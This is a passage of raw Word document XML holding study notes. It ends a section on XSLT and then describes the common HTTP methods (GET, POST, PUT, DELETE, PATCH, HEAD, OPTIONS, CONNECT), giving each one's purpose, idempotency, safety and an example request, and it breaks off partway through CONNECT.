          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The same XML data can be reused with different XSLT stylesheets for different purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452BD351" w14:textId="77777777" w:rsidR="00EB62D9" w:rsidRPr="00585961" w:rsidRDefault="00EB62D9"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In essence, XSLT provides a robust, standardized way to transform and present XML data in various formats, making it a powerful tool for handling XML-based data in web applications, reports, and data exchanges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534750A8" w14:textId="20EB0F3C" w:rsidR="004F5B43" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004F5B4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E6FC525">
          <v:rect id="_x0000_i1982" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07836923" w14:textId="05B84D5D" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="002E1D1C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="405" w:name="_Toc196307885"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the action types of http</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="405"/>
    </w:p>
    <w:p w14:paraId="1CB8A62E" w14:textId="62DDA9E4" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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 xml:space="preserve">HTTP (HyperText Transfer Protocol) defines several </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>action types</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that indicate the desired action to be performed on a specific resource. These methods are also referred to as </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP verbs</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here are the most commonly used HTTP action types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CBF7DE" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17"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1. GET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F0F297" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1802"/>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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retrieves data from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579756E8" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1802"/>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Idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Yes (repeated requests will yield the same result).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EDEA21" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1802"/>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afe</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Yes (it does not modify the server's state).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393BEAC0" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1802"/>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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Fetching a web page or requesting data from an API endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA99DC4" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1802"/>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GET /api/products (fetch a list of products).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6816561F" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17"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2. POST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF2CF02" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1803"/>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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Submits data to the server for processing, often resulting in a change in the server’s state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFC6135" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1803"/>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Idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: No (repeated POST requests may have different effects).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292A1428" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1803"/>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afe</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: No (it can modify the server's state, such as creating a resource).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E541D92" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1803"/>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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Submitting a form, creating a new resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFF381E" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1803"/>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POST /api/products (create a new product).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591894B7" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17"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3. PUT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0E04B4" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1804"/>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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Updates an existing resource with the data sent in the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D72728" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1804"/>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Idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Yes (repeated PUT requests will yield the same result).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14062B76" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1804"/>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afe</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: No (it modifies the resource's state).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBE0025" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1804"/>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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Updating the details of an existing product.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531860B5" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1804"/>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PUT /api/products/123 (update the product with ID 123).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6942F4B7" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17"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4. DELETE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B2FF13" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1805"/>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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Deletes a resource on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F059A4" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1805"/>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Idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Yes (deleting a resource multiple times results in the same outcome — the resource is no longer present).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ABA4F8" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1805"/>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afe</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: No (it modifies the server’s state by removing a resource).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E4A75F" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1805"/>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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Deleting a product.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F5A2DB" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1805"/>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DELETE /api/products/123 (delete the product with ID 123).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B758000" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17"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5. PATCH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BC7509" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Partially updates a resource. Unlike PUT, which replaces the entire resource, PATCH only updates the specified fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E2CFFC" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180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Idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: No (repeated PATCH requests can modify the resource differently each time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D51B7BC" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180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afe</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: No (it modifies the resource's state).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23028230" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Updating only a specific field of a product, like changing the price.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32492B94" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1806"/>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PATCH /api/products/123 (update only the price of the product with ID 123).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1992D3" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17"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6. HEAD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C227C1F" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1807"/>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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Similar to GET, but it only retrieves the headers, not the body of the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12009871" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1807"/>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Idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Yes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE4DF19" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1807"/>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afe</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Yes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564F96D3" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1807"/>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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Checking if a resource exists or retrieving metadata without downloading the resource itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465A0733" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1807"/>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HEAD /api/products/123 (check if the product exists and get metadata).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D3149C" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17"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7. OPTIONS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACA596B" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1808"/>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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Describes the communication options for the target resource. It allows the client to discover which HTTP methods are supported by the server for a specific resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD55947" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1808"/>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Idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Yes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CED8ED" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1808"/>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afe</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Yes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2864D7BD" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1808"/>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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Asking the server which methods are supported for a given resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB526C2" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1808"/>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OPTIONS /api/products (find out which HTTP methods are allowed for /api/products).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239CA3B0" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17"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8. CONNECT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B406E27" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1809"/>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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Establishes a tunnel to the server, typically used for SSL/TLS encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CEB87F" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1809"/>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lastRenderedPageBreak/>
        <w:t>Idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: No.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728889F2" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1809"/>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afe</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
